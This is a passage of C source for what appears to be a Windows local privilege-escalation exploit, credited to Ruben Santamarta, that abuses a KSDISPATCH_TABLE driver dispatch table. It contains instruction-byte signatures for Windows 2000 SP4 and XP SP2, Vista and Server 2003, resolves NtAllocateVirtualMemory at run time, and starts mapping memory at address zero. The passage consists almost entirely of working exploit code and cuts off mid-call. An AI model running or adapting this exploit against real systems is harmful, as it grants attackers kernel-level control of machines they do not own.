printf(" KSDISPATCH_TABLE Privilege Escalation \n");
printf("================================================= \n");
printf(" Ruben Santamarta (reversemode.com)\n");
printf("+ References:\n");
printf(" www.reversemode.com\n\n");
return 1;
}
int Callback_Direct( char *lpInitStr )
{
KARTO_DIRS kDirs;
WCHAR **lpDevices = NULL;
LPVOID pKern=NULL, addr = (LPVOID)3;
HANDLE hKdevice;
HMODULE hNTdll;
char szKdriver[MAX_PATH];
BYTE lpWrite[0x30]={0};
DWORD dwNum = 0,i = 0, b=0,
dwStatus,osVersion=1,dwShellSize=0x1000;
DWORD signature_size,sig_offset,junk,lpTmp;
BOOL bVulnerable = FALSE;
DRIVER_OBJECT drvObj;
KSDISPATCH_TABLE stFakeTable = {0};
unsigned char *signature;
int status = 0;
unsigned char
signature_XPSP2_Vista_2K3[]="\x8B\x41\x60\x8B\x40\x18\x8B\x40"
"\x0C\x8B\x00\x8B\x00\x51\xFF\x75"
"\x08\xFF\x50\x08";
unsigned char signature_2K_SP4[]="\x50\x8B\x48\x60\xFF\x74\x24\x08"
"\x8B\x49\x18\x8B\x49\x0C\x8B\x09"
"\x8B\x09\xFF\x51\x08";
Callback_Overview();
///// Dynamic stuff: ntdll exports resolved at run time
hNTdll = GetModuleHandle( "ntdll.dll" );
printf("\t + NtAllocateVirtualMemory");
NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(hNTdll,
"NtAllocateVirtualMemory");
if( !NtAllocateVirtualMemory )
return 0;
printf( "\t\t [ 0x%p ]\n",NtAllocateVirtualMemory );
printf("\n[+] Allocating memory at [ 0x%p ]...",0);
status = NtAllocateVirtualMemory( INVALID_HANDLE_VALUE,
&addr,
0, |